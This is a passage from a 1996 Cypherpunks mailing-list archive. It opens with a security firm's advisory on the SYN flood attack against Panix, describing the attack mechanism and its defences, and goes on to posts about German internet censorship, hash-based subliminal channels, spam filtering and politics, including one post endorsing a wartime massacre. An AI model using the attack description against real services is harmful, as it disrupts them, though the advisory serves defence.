been able to receive email. Many other ISPs are suffering from the SYN flood attack. This attack is being discussed on many mailing lists, newsgroups, and Thursday's Wall Street Journal (9/12/96). Fortunately a solution already exists as we discuss below. Everyone connected to the Internet relies on TCP/IP. When you establish a connection with TCP, you do a 3-way handshake. The connecting host sends a SYN packet to the receiving host. The receiving host sends a SYN|ACK packet back and to fully establish a connection, the connecting host finally responds with an ACK packet. In a SYN flood attack, an attacker host sends many SYN packets and does not respond with an ACK to the SYN|ACK's. As the receiving host is waiting for more and more ACK's, the buffer queue will fill up and the receiving machine can no longer accepts legitimate connections. This means that attackers can block your email, web, or any other service you are providing on the Internet. To even make this attack worse, the code exploiting the problem randomizes the source address of the attacking host. Thus, the receiving machine gets packets that appear to be from all over the Internet, hiding the location of the attacker. Solution There are several things we can do to stop these attacks from being effective. With the routers for most ISP, they should be blocking any non-internal addresses from leaving their network and going to the Internet. This will stop an attacker if their ISP implements this. Unfortunately, this does not stop an attack from areas on the Internet that do not block that. But at least the ISP can feel comfortable to know that an attacker can not launch his attack from that ISP. Here are two methods of helping eliminate the problem. Some of the exploit code I have seen does not pick a random source port. It would be easy to block the attack with a router denying any packets coming from a specific source port. This may not be too effective because of the trivial nature of adding code to randomize the source port, sequence number, source address, and TTL. But it might help you temporarily if you notice the attacks have any pattern that can be blocked by router rules. Another way to fix this is to set the kernel maximum number of half open connections allowed (SO_MAXCONN) to a higher number than the default value. We have a tool that will look for SYN packets that do not get followed with ACK and clean the half open connections by sending a RST packet. This unclogs the port and allows legitimate connections to happen. This tool is called RealSecure (tm). To obtain a copy of the RealSecure tool, send email to majordomo at Iss.net and within the body of the message, type: subscribe realsecure RealSecure (tm) is a comprehensive attack recognition and real time response tool that ISS is alpha testing and will expire in 60 days. - -- Christopher William Klaus Voice: (770)395-0150. Fax: (770)395-1972 Internet Security Systems, Inc. "Internet Scanner finds Ste. 660,41 Perimeter Center East,Atlanta,GA 30346 your network security holes Web: http://www.iss.net/ Email: cklaus at iss.net before the hackers do." ------- end ------- -- [:]====================================================================[:] [\] Mycroft >>>>>[DataSphere]<<<<< [=] [=] Key fingerprint = DD B1 A7 D9 2D DF A0 F7 23 C2 6B EC 5A AD 01 A9 [\] [:]====================================================================[:] From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 13 17:48:34 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sat, 14 Sep 1996 08:48:34 +0800 Subject: NANDO: Radikal Message-ID: <01I9FSS1YYRO9ULPJS@mbcl.rutgers.edu> I've sent (using wURLd Presence) the URLs of some of the mirror sites to several search engines. -Allen > _________________________________________________________________ > The Peanut Roaster > _________________________________________________________________ > GERMANS PROBE COMPUTER FIRMS OVER ELECTRONIC PAPER > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > BONN (Sep 13, 1996 4:05 p.m. EDT) - Germany's Federal Prosecutor's > Office said on Friday it was investigating a number of so-called > Internet providers because they were giving computer subscribers > access to a radical left-wing electronic newspaper. > A spokesman for the office said the firms were suspected of inciting > criminal activity and advertising for a terrorist group because they > had failed to block access to the left-wing Internet page "radikal > 154." > Among other things, the electronic site provides instructions on how > to sabotage railway lines. Prosecutors consider it to be terrorist > propaganda. > On Friday, the page was still available via major Internet providers > CompuServe Inc, AOL and T-Online, the online service of > telecommunications giant Deutsche Telekom. > AOL said in a statement that it was technically impossible to block > the server where "radikal" originated, and that the page was anyway > now available via at least 30 other servers and in thousands of > electronic copies. > Authorities have been getting increasingly frustrated that radical > left- or right-wing material whose distribution is a criminal offence > in Germany can be picked up here on the Internet from computers in > foreign countries. The server where "radikal" originates is located in > the Netherlands. Chuckle... > Firms giving access to the Internet -- a network of interlinked > computers providing access to millions of electronic pages -- say they > are no more responsible for the contents than a telephone company is > for the conversations it carries. > On Thursday Germany's office for the protection of juveniles for the > first time put an Internet page -- produced in North America by > leading Nazi apologist Ernst Zuendel -- on its list of banned > publications. > But officials conceded that the move was likely to have little > practical effect, and provider T-Online said it had no intention of > blocking the page. [...] > Copyright © 1996 Nando.net From EALLENSMITH at ocelot.Rutgers.EDU Fri Sep 13 17:49:56 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Sat, 14 Sep 1996 08:49:56 +0800 Subject: NANDO: Backup Program Message-ID: <01I9FSLFLT349ULPJS@mbcl.rutgers.edu> Unfortunately, they're only using DES - probably because they do serve international customers. > _________________________________________________________________ > The Peanut Roaster > _________________________________________________________________ > HIAWATHA BRAY: ON-LINE BACKUP SAVES THE DAY > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 The Boston Globe [...] > (Sep 6, 1996 01:17 a.m. EDT) -- It's written in almost every computer > instruction manual and technical guide. It's encouraged, sometimes > even mandated, by MIS lords. Yet it's almost universally ignored. [...] > Fortunately, just before the drive when south I had taken up an offer > from a company called Connected Corp., of Framingham, Mass., which > markets an appealing product called DataSafe. [...] > DataSafe is an on-line data backup system. You load the DataSafe > software onto your computer then connect via the Internet to > Connected's data center. The system asks for a credit card number and > a password of your choosing. Once done, DataSafe searches your hard > drive, identifies every data file, and uploads them to the DataSafe > computer. The system doesn't back up your applications, such as your > copy of WordPerfect; just the data files you've created with the > software. DataSafe stashes your stuff in two separate computers to > ensure nothing is lost. [...] > But a dead hard disk works wonders on one's powers of concentration. > With all my original data gone, it was time to find out whether this > DataSafe really worked. I reinstalled the DataSafe software onto my > new hard drive, made the connection with Connected, and waited to > receive my files. No dice. I'd forgotten the password. And Connected > refused to give it to me or provide me with a new one. That's because > the backed-up data is encrypted, and the password is the key. Even the > folks at Connected can't crack the encryption without your password. > They designed the system that way to reassure customers that nobody > can tamper with the data stored there. [...] > But many, perhaps most, people can't afford to lose a fragment of > data. For them, on-line data backup systems like DataSafe may be the > answer. The company charges $14.95 a month to store 50 megabytes of > data. The software can be set to automatically back up all new and > modified files every day whenever you choose. [...] > Businesses can use the system as an inexpensive data network. Just > create an account, then give the password to everybody in your > company. Now you can store commonly-used files on the backup server, > where they can be downloaded by anyone who needs them. > Connected isn't the only company that has figured this out. MCI Corp. > is selling an Internet-based data backup service. So is McAfee > Associates, the maker of anti-virus software. Many people will > hesitate to store their computer files with a stranger, encryption or > no encryption. But if that makes you uneasy, imagine how you'd feel if > your hard disk crashed. Unless you're a columnist, it could be a > disaster. > (Hiawatha Bray is a member of the Globe staff. You can send him > electronic mail at Bray at globe.com.) [...] > Copyright © 1996 Nando.net From unicorn at schloss.li Fri Sep 13 18:53:31 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 14 Sep 1996 09:53:31 +0800 Subject: did you go to school? In-Reply-To: <32399315.19E7@precipice.v-site.net> Message-ID: On Fri, 13 Sep 1996, HipCrime wrote: > >> THIN SLICES CUT FROM OUR PRECIOUS FORESTS. > > > > "OUR?" Since when did my trees become partially yours? > > JMR > > JMR, it's hard to believe that your English education is SO LACKING, > that you missed the fact, that in my sentence quoted above, the word > "ours" refers to MANKIND IN GENERAL, not me personally. > > Go sit in the corner with the duncecap on, and don't come out until you > can read an 8th grade piece of literature (with full comprehension). > > -- HTTP://www.HIPCRIME.com > Look, I really thing it would be in everyone's best interest if you just leave the list and ignore any e-mail from list members for a while. It will save you, and everyone a good deal of time. Your repeated replies are THIN SLICES CUT FROM OUR PRECIOUS BANDWIDTH. (Note that I have placed your address in my mail filter and thus will not be replying to your reply). -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From robert at precipice.v-site.net Fri Sep 13 18:59:24 1996 From: robert at precipice.v-site.net (hipcrime) Date: Sat, 14 Sep 1996 09:59:24 +0800 Subject: did you go to school? Message-ID: <199609132320.QAA21103@dfw-ix10.ix.netcom.com> JMR, is everybody WRONG, who does not follow your line of thinking?????????????? We just disagree, nobody's WRONG here. CypherWimps need, more than anything else, to get down off their high-horses for once. CyberSpace ain't Reality . The reverse is true as well. --HTTP://www.HIPCRIME.com From jim at suite.suite.com Fri Sep 13 19:01:18 1996 From: jim at suite.suite.com (Jim Miller) Date: Sat, 14 Sep 1996 10:01:18 +0800 Subject: really undetectable crypto Message-ID: <9609132313.AA09496@suite.com> > Your assumptions are correct. Applied Cryptography by > Schneier discusses this method, referring to it as a > "subliminal channel". Why am I not surprised. :-) > Because of the very (VERY) slow transmission times (on > the order of 1 bit/message), he notes it primarily as a > secure method of exchanging keys. > I would think you could do better than 1 bit per message. Using just hashes, I would think you could get at least 4-8 bits per message using a standard Pentium-class machine. Maybe more, I haven't actually run any tests to see how long it would take to generate innocent messages that produces hashes with specific bits in certain positions. > In his discussion, he also incorporated a bit in the > signature, thus assuring the communication is > travelling to the intended recipient unmolested. I don't see why this is necessary. If the hidden message is encrypted using a key (or key pair) known only to Alice and Bob, then Walter should not be able to fool Bob. Walter could disrupt the communications in any number of ways, but he wouldn't be able to generate innocent messages that produce hashes that contain bits that combine to form a message encrypted using a key (or key pair) known only to Alice and Bob. > However, to be "extremely sublime", your method could be > incorporated with otherwise signed messages: while the > signature appearing with your message includes an MD5 > hash, the real "stego bit" is the first bit of an RC4 hash of > the same file, as computed by an external program on the > receiver's end. > The above paragraph has given me an idea: You don't need to send hashes or digital signatures to send hidden encrypted messages. All Alice needs to send is the carefully constructed plaintext. Bob can generate the hashes himself, extract the proper bits and attempt to decrypt the hidden message. If the hidden message does not decrypt, then either the plaintext was tampered with, it was forged, or not all of the plaintext arrived. That being the case, then I think we have a very simple proof that any communications channel, even one that allows only unsigned plaintext messages, can be used to send arbitrary encrypted messages (if a bit slowly). So much for Clipper. Jim_Miller at suite.com From bille at metro.net Fri Sep 13 19:54:33 1996 From: bille at metro.net (William Ehrendreich) Date: Sat, 14 Sep 1996 10:54:33 +0800 Subject: 56 kbps modems Message-ID: <00230911403893@metro.net> Yeah... and besides that ... if your local telco has lifted your load coils then you have a much better chance! ---------- > From: Enzo Michelangeli > To: Asgaard > Cc: cypherpunks at toad.com > Subject: Re: 56 kbps modems > Date: Friday, September 13, 1996 10:24 AM > > On Fri, 13 Sep 1996, Asgaard wrote: > > > >U.S. Robotics and Rockwell International are planning new modems with > > >speeds up to 56 kbps a second, almost double the speed of the fastest > > >rate now available. The new devices should be available by the end of > > >the year, although their top speed initially may be less than 56 kbps. > > >(Wall Street Journal 12 Sep 96 B11) > > > > People who seemed to know used to say that 'the Shannon limit' > > set an absolute upper limit around 40 kbps. Has Shannon been > > proven wrong, or what? > > Well, it all depends on the signal-to-noise ratio. Also, if the noise is > not white gaussian the situation can be even better. > > Enzo > From unicorn at schloss.li Fri Sep 13 20:02:59 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 14 Sep 1996 11:02:59 +0800 Subject: Internet Drivers' Licenses In-Reply-To: <199609132026.NAA15888@netcom9.netcom.com> Message-ID: On Fri, 13 Sep 1996, Mike Duvos wrote: > Bill Stewart writes: > > > Anybody for an Internet Driver's License? [Too much spam, some designed to avoid filtering by humans or machines] > Just being able to filter out posts from Net addresses that > don't correspond to real identifiable humans posting under > their legal names would be a good first step. I'm crushed. Seriously, what is the import of the "real identifiable human" or the "posting under their legal names" point? If an AI program posts quality stuff, what's the difference? Why the import of true "legal" names? Why not simply develop reputation signatures? The concept that "legal names" are some how a credential is silly. I have a friend who has four, with matching SSN cards. What your suggestion basically says is "instead of developing our own decentralized reputations system for filtering lets use one already in place, i.e. the state Department of Motor Vehicles. Of course the problem is that you have to rely on the "Is a person" judgment of the DMV which amounts to the education and judgment of the $21k a year "administrative assistant" who stands at the door looking at "birth certificates" and deciding whether to let people in. Not only is the reputation of such a system questionable, the system is centralized, easily fooled by anyone with a dose of creativity, and hampered by corruption and institutional disinformation (witness relocation, government alteration, etc.). In any event, getting reputation credentials from a decentralized "web of trust" is a much more efficient answer, especially where you can assign your own levels of trust to each signator. Mr. Duvos' idea is, in my view, a step backwards. > -- > Mike Duvos $ PGP 2.6 Public Key available $ > mpd at netcom.com $ via Finger. $ -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From dlv at bwalk.dm.com Fri Sep 13 20:28:35 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 14 Sep 1996 11:28:35 +0800 Subject: PANIX.COM down: denial of service attack In-Reply-To: <3.0b15.32.19960913111921.00b03180@mail.teleport.com> Message-ID: <07y8TD6w165w@bwalk.dm.com> Alan Olsen writes: > At 10:13 AM 9/13/96 -0400, pjb at ny.ubs.com wrote: > >> "As to who might be targeting Panix, the firm's Mr. Rosen speculated it > > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > > >It could, of course, also be someone, from a set of several million, that > >find Mr. Rosen to be such as odious prick that they did it just to drive him > >out of their misery. Just thinking out loud.. > > Or it could be any of the readers of 2600 (which published an article on > SYN floods in the last issue). Come ON, folks. I've met Alexis. I don't like many things he does, and I'm sick and tired of the shitty Usenet feed he gives me :-), but he's much less of an "odious prick" than practically any other ISP owner, large or small. If anyone was looking for an "odious prick" to harrass, they'd probably start with Barry Schein of world.std.com. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dthorn at gte.net Fri Sep 13 20:32:32 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 14 Sep 1996 11:32:32 +0800 Subject: common sense In-Reply-To: <323896EE.3BC3@precipice.v-site.net> Message-ID: <3239A8F4.14D4@gte.net> HipCrime wrote: > And rather than "dispensing drugs in clinics," why not simply > scrap the drug laws entirely? People have a *right* to do as > they please with their bodies. > Let's hear it for common sense. It's the first decent posting I've > seen to this list. > -- HTTP://www.HIPCRIME.com A question for you: In the Civil Rights era (1960's mostly), we dealt with the question of whether people had the "right" to not only choose their neighbors, but whether they could extend that logic, so once they move in, whether they could "enforce" the status quo by preventing other people from moving in if those other people didn't "fit in" somehow. If drugs and/or other items of Vice are liberalized, there will be a tremendous marketing opportunity created, and new stores and new departments within existing stores will pop up everywhere offering the newly-liberalized goods and services. So my question is, since there are "dry" areas in the country now, where the citizens can vote to exclude alcohol sales, for example, will drugs, prostitution, gambling, etc. fall within the purvey of citizen democracy as in the "dry" county example, or will there be new problems with this analogy, and will any of those new problems relate to the Civil Rights issues I mentioned previously? From ses at tipper.oit.unc.edu Fri Sep 13 20:33:04 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Sat, 14 Sep 1996 11:33:04 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: On Fri, 13 Sep 1996, Timothy C. May wrote: > > The 70% already _are_ cutting the throats of the other 30%. It's called a > 60%+ tax rate. This is the sum of: federal income tax, state income tax, > city tax, sales tax, gas tax, energy tax, property tax, entertainment tax, > special excise taxes on alcohol, cigarettes, etc., and miscellaneous other I'm not sure how you get to 60%; I assume you're talking average tax rate, not marginal; whenever I've tried to figure out my average rate, even in California, it never went above ~31%. This included a pack of fags a day, which is the most heavily indirect taxed item in your list. If you're smoking enough to get up to 60%, you've got worse problems than taxes :) Simon p.s. Is anyone on cpunks working at Harry Browne's hq in DC? Some friends in Carolina asked me to pick up some bumper stickers and stuff before I leave the District. --- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From AwakenToMe at aol.com Fri Sep 13 20:35:23 1996 From: AwakenToMe at aol.com (AwakenToMe at aol.com) Date: Sat, 14 Sep 1996 11:35:23 +0800 Subject: unwanted mail..what can I do? Message-ID: <960913194609_522174372@emout17.mail.aol.com> I recieved mail from netfree.com.. I tried mailing it back (it def. had a forged address, but I got the netfree from the mail header.....) So anyway..... I tried sending to root at netfree....my mail was rejected (not unknown ...it was rejected by the system) said it wasnt authorized... so I tried support at netfree...same thing. It ISSSSS rather annoying...any sugestions? From dthorn at gte.net Fri Sep 13 20:52:26 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 14 Sep 1996 11:52:26 +0800 Subject: China joins Singapore, Germany, .... In-Reply-To: Message-ID: <32399C94.23FD@gte.net> Dr.Dimitri Vulis KOTM wrote: > Duncan Frissell writes: > At 04:41 AM 9/9/96 -0700, Timothy C. May wrote: > Prison sentences in Germany for those who reveal forbidden information > about "the Holocaust," > In a country where you get 10 months for stabbing a famous tennis star > in the back, prison isn't much of a penalty. > I'm sure the sentense would have been different if she weren't a > Slavic untermensch, or if he were, say, a Turk. > A friend of mine related how his father - a Jew and a Soviet Army > officer - commanded a company in WW2. In 1944 they came across a > > church where over a thousand Nazi soldiers surrendered without > reistance. He announced them "Ich > bin ain Jude" and had them all executed. I think he did the right > thing. > Dr.Dimitri Vulis KOTM > Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, > 14.4Kbps First of all, soldiers are just the little guys, like you and me, no more "Nazis" than "Communists" or whatever we Americans are in the eyes of the third world, etc. Remember the Godfather scene where Al Pacino is walking through the town in Sicily and he says "where are all the men?"? You can "justify" revenge all you want, and what do you get? Honor? Justice? You get a lot of dead people, and in the next generation, nobody gives a shit. Oh, they "continue" the mindless hatred of earlier generations, spurred on by (take your pick here), but you can't really connect the issues seamlessly across generations, unless you simplify them in the extreme, such as "starvation and deprivation are a causative factor in war", or some such thing. Economic opportunity is certainly a leading cause in war and genocide, i.e., in a "free" world society, it should be easier to remove a profit motive than to remove starvation, if you know what I mean, and I think you do. From dthorn at gte.net Fri Sep 13 21:03:31 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 14 Sep 1996 12:03:31 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: <2.2.32.19960910190024.007245e4@pop.ricochet.net> Message-ID: <3239A15E.4907@gte.net> Greg Broiles wrote: > At 03:30 PM 9/9/96 -0700, Dale Thorn wrote: > If govt. protects its "sources and methods", however nefarious, to the > extent that the public is never asked to assent to these methods (even > though a few of us know about them anyway), then the public doesn't > have to become overtly cynical about what's going on. > But the public *is* asked to assent to those methods - your chance to > vote on them is known colloquially as "jury duty". > Greg Broiles |"Post-rotational nystagmus was the > subject of > gbroiles at netbox.com |an in-court demonstration by the People > http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt > |Studdard." People v. Quinn 580 NYS2d > 818,825. I missed a lot of this being off-line for a few days. The jury discussion is a good one, but nowadays we have sequestering or no, cameras in the court or no cameras, new gag rules all the time, including books being published or even planning to be published, the "no profit" rules for convictees (or those about to be convicted), and don't forget the (gasp!) influential organs such as National Enquirer who "digitally enhance" certain photos such as Nicole Simpson, Liza Minelli, etc. If there's a chance of ever cleaning up the justice system, would it mean a prosecution of those who promoted the Incubator Baby scam for the Gulf War, for example? From dthorn at gte.net Fri Sep 13 21:05:38 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 14 Sep 1996 12:05:38 +0800 Subject: ALPHACIPHER - An unbreakable encryption program. In-Reply-To: <960910.071433.8A6.rnr.w165w@sendai.scytale.com> Message-ID: <3239BADE.2B5D@gte.net> On the below "conspiracy theory" comment: Aren't "conspiracy theory" and "conspiracy theorist" now used as catch-all (and derogatory) terms by mainstream afictionados to identify persons and orgs they consider to be enemies of the statist point of view? Remember the last election when Mr. Paraniod (Perot) was running, and newspeople were using the term "conspiracy buff", then, when reminded that the mainstream folks have their own sacred conspiracies which they milk much money from, they (the newspeople) switched to "conspiracy theorist" instead. I have to laugh when Bugliosi gets on TV ranting about how "there couldn't possibly be a conspiracy in the OJ murders", but how easy one forgets, Bugliosi gained his lasting fame from a ridiculous (seemingly) theory about "Helter Skelter", etc. Roy M. Silvernail wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > In alt.security, survival at aa.net writes: > > [ attribution scrambled ] > > >> True, but somehow I have a feeling that Alphacipher is not a one-time > >> pad, and thus is breakable. > > > > This assumption is not true. ALPHACIPHER is, indeed, based upon an OTP. > > We've solved all of the problems associated with pad creation, > > distribution, packaging and many other concerns that have previously > > limited the use of a cipher in this class. > > Their web page alludes to a OTP-like operation where you have to > purchase key "refills". It doesn't say where they store the escrowed > copies of the key material. > > > Visit our net page at http://www.aa.net/cyber-survival-hq for more > > information, and read the reply in response to the unfounded attack by > > Curtin, posted above. > > I recommend this page, if only for the great conspiracy theory about > automated telephone line scanning. > - -- > Roy M. Silvernail [ ] roy at scytale.com > PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 > Key available from pubkey at scytale.com > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBMjVcuRvikii9febJAQG1wQP+PPevphnwFiUnhwfHfi9eSLI/lJz++eaw > X4Xo6Oa343rpnNoNw0D51aIRZbRmh9QRt1nhNbD3fPvNPjjvzxW58zgAtX5+kxfk > b54pBzlVTEYcPBFXatfQuCjhhd95gjaMXYsKAx6rUNt02QFihGWqID48huN9nFOZ > 0MlhN5IxIBk= > =y4kc > -----END PGP SIGNATURE----- From ravage at einstein.ssz.com Fri Sep 13 21:14:59 1996 From: ravage at einstein.ssz.com (Jim Choate) Date: Sat, 14 Sep 1996 12:14:59 +0800 Subject: common sense (fwd) Message-ID: <199609140236.VAA03531@einstein> Forwarded message: > Date: Fri, 13 Sep 1996 11:33:24 -0700 > From: Dale Thorn > Subject: Re: common sense > > HipCrime wrote: > > And rather than "dispensing drugs in clinics," why not simply > > scrap the drug laws entirely? People have a *right* to do as > > they please with their bodies. > > Let's hear it for common sense. It's the first decent posting I've > > seen to this list. > > -- HTTP://www.HIPCRIME.com > > A question for you: In the Civil Rights era (1960's mostly), we dealt > with the question of whether people had the "right" to not only choose > their neighbors, but whether they could extend that logic, so once they > move in, whether they could "enforce" the status quo by preventing other > people from moving in if those other people didn't "fit in" somehow. > > If drugs and/or other items of Vice are liberalized, there will be a > tremendous marketing opportunity created, and new stores and new > departments within existing stores will pop up everywhere offering the > newly-liberalized goods and services. So my question is, since there are > "dry" areas in the country now, where the citizens can vote to exclude > alcohol sales, for example, will drugs, prostitution, gambling, etc. > fall within the purvey of citizen democracy as in the "dry" county > example, or will there be new problems with this analogy, and will any > of those new problems relate to the Civil Rights issues I mentioned > previously? > History already has examples of such incidences. Alaska, California, and other states have tried various levels of legalization. To date I believe that all such experiments have ended because of federal pressure on the uncooperative states. The Indians 'right by treaty' to operate gambling casino's is another good example of a contemporary situation. Jim Choate From dlv at bwalk.dm.com Fri Sep 13 21:15:08 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 14 Sep 1996 12:15:08 +0800 Subject: Internet Drivers' Licenses In-Reply-To: <199609132026.NAA15888@netcom9.netcom.com> Message-ID: mpd at netcom.com (Mike Duvos) writes: > At this point, I would love the ability to filter news and mail > according to some criteria related to the sender's probable > reputation. Back in the early days of C&S, spam was an > intellectual issue. Now it is a good chunk of the entire > bandwidth of major components of the Net. No it's not. Look at the size of the spam reported on a week in news.admin.net-abuse.announce. Divide it by the total Usenet traffic in a week. Tell us what you get. > I am now getting more junk email than email from people I > care to correspond with. It seems one can't even read the > scholarly newsgroups anymore without "Come Watch Us Lick > Ourselves on the Web" messages popping up regularly. Have you looked at NoCeM notices? If the "Lick my Pussy Cheap" article is multi-posted more than 15 times, then the CancelMoose[tm] will post a NoCeM notice for it in alt.nocem.misc. (A big 8 newsgroup may be created eventually.) If you use decent newsreading software, you can instruct it to look at the NoCeM notices and mark the inappropriate articles as being already read, so you won't see them. Look at CM's homepage at http://www.cm.org for more information about NoCeM's. Some people, including myself, issue NoCeM notices for articles in certain newsgroup which aren't multi-posted, but are nevertheless off-topic. Here are the PGP signatures for the 'bots I run: Type bits/keyID Date User ID pub 1024/7BECC7F1 1996/08/08 pub 1024/F1CB011D 1996/03/16 pub 1024/5BEC22E5 1996/08/08 pub 1024/FDF03179 1996/08/09 pub 1024/6396A13D 1996/08/08 pub 1024/B1E05325 1996/08/08 pub 1024/946493D5 1996/08/08 pub 1024/FEBCB511 1996/08/08 Public key for : -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAzIJ2+4AAAEEAL0WxIcWypgl7EFfVmJSfSCGmWTuzEaMHvbPxdyN1lm4Dum3 M9DVk8fqaPWLqEjqXOJ700Op3Dl/jXoYbv38tXpwaZ/Z769gXFHnEJOkX1m1PqCo 0Sq5naPauhIt6cpaminvfourqwbWjDmDWn7/1T5K4V4yehEnj1UsIER77MfxAAUR tCM8YWx0LnJldmVuZ2UtTm9DZU1ib3RAYndhbGsuZG0uY29tPg== =B5BZ -----END PGP PUBLIC KEY BLOCK----- Public key for : -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAzFLAe4AAAEEAOLyLxMchegiEnjrf39JnpoO3UiEf7PelgOgbDAWafnj2cQV HfhBWJZDsCekCBi64Wu6YsoF/hY6QkA5QwQ7O7ZXB89chBIdOeJIlFFo9qq4LWRX vlQzcSDvt93f2S+HHCjQCYS0C1N+hS1FcseJnmRYBtAKsqwVFRkXW//xywEdAAUR tCY8bWlzYy5qb2JzLm1pc2MtTm9DZU1ib3RAYndhbGsuZG0uY29tPg== =SG3Y -----END PGP PUBLIC KEY BLOCK----- Public key for : -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAzIJ6M4AAAEEAL4+AoiMaQnGJfm868jVi9Ol97Fz002PKepBUwEJJzGxm91K MbF/TC977/vMZlaXIp2JYD4+v0nfweb17cWtPcqhXQaHStCvvjVu96NGgajcsm7u lJeoag7bsEwcvG3WgGyEXcYCsWLl7/YAl41bhWFGI1j++BzAT2WekuVb7CLlAAUR tCA8bnljLmZvb2QtTm9DZU1ib3RAYndhbGsuZG0uY29tPg== =PQxj -----END PGP PUBLIC KEY BLOCK----- Public key for : -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAzIKhHIAAAEEAKzBmAsBxOBg5bsCsSlIbe1uhQFBYP7sFS1t0xQHEOQRfp3K bGBoxkVPp/lHaOya+TALwLC45/b4aqCwPIiXftcp1/U1e9xBhac5AhCtjJK+1itQ vK9qZswPpikUm/1r//3gbXgaR8dVbgU72Sd2z6ddoqu3MLvTAWq10JL98DF5AAUR tCM8bnljLmdlbmVyYWwtTm9DZU1ib3RAYndhbGsuZG0uY29tPg== =oMRH -----END PGP PUBLIC KEY BLOCK----- Public key for : -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAzIJ6kkAAAEEAK+ug4kBmJv7amuFSjgJ9+U05JRctOxLMQvWwQA5lQIwm0wM jTdlxA9h7l1QUry8Cah3LTCghTTpl67UPgwF4Ht2Msy6Rj8qCS49wIAKNWTIysex dx+mfVPWl+/nVXbkgesjMbTm8Zc5fNos2Hi2YNEP3oPdI7qHnl0kDBhjlqE9AAUR tCQ8bnljLnNlbWluYXJzLU5vQ2VNYm90QGJ3YWxrLmRtLmNvbT4= =zZzz -----END PGP PUBLIC KEY BLOCK----- Public key for : -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAzIJ2hoAAAEEAKwXMPkoGemZgPoQwyLLyK+Pq951FAPb/YuEQ4ZMd2wfm0jo nR+DrmCkCmIyH0OIbSuXRCXeLdO+tN91DdqCvAQA/FbKVUkLSxSS4eMRC5O9GVF9 Y+hY5NzIk3hPS9HLtPqZd4nlO//qi6vk4xXxHxqpEMssnWNBdTmuqP6x4FMlAAUR tCE8cmVjLmh1bW9yLU5vQ2VNYm90QGJ3YWxrLmRtLmNvbT4= =fTWy -----END PGP PUBLIC KEY BLOCK----- Public key for : -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAzIJ688AAAEEAOZtfqm48a0q/eXlVXeE3v4+8oceIPBHvnOoulrsDmH1KQzv vCwZrQP1d+Q/I1Sbk6kE7FLWva77Pmr+cRzv8pRA52HYNFZinu62g8sXtTHeX67J Jb3woVg1ZlHNxzUHQ4lSXE1GZ2x08OjuOpEPBIVsGxUfGJzYRTLKBVWUZJPVAAUR tCA8c2NpLm1hdGgtTm9DZU1ib3RAYndhbGsuZG0uY29tPg== =so64 -----END PGP PUBLIC KEY BLOCK----- Public key for : -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAzIJ70UAAAEEAMNuejWXicbK3jSpBGXQeSYmIT2+XENPwXMxKIJIGtOJ5ILo WRu3r1Q1QkFKJJ3u68PDQfGYeisLvnpqLqGZoyhWiGqPkN4OxNtFku1L72MDwbF+ 4XqxFtxzOLeH/lFc7MQDTji4nbMgUD0GXBsNITRZ+YyvpnrVd4z0ceX+vLURAAUR tCM8c2NpLnBoeXNpY3MtTm9DZU1ib3RAYndhbGsuZG0uY29tPg== =9q4g -----END PGP PUBLIC KEY BLOCK----- > It's really getting to the point where the time-honored > suggestion of "just hit your delete key" cannot deal with the > obverwhelming amount of Drek posted, much of it with subject > lines deliberately designed to blend in with the newsgroup > topic. Are you talking about newsgroups or mailing lists? I don't find reading newsgroups a problem with the proper software. I am somewhat annoyed by the trash I get via e-mail, especially from this mailing list (lies, off-topic rants, personal attacks from Tim May (fart)). > Just being able to filter out posts from Net addresses that > don't correspond to real identifiable humans posting under > their legal names would be a good first step. You have got to be fucking kidding! Some of the most interesting Usenet articles in hostory were posted anonymously. > Purely voluntary, of course, since any filtering would be > done at the reading end, and people could still post anything > they liked. Yes - people should be able to post anything they like to Usenet, including spam, and other people should be able to submit voluntarily to other people's "censorship" if they choose to. NoCeM's do this very nicely. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From norm at netcom.com Fri Sep 13 21:19:05 1996 From: norm at netcom.com (Norman Hardy) Date: Sat, 14 Sep 1996 12:19:05 +0800 Subject: 56 kbps modems Message-ID: At 5:09 AM 9/13/96, Asgaard wrote: >>U.S. 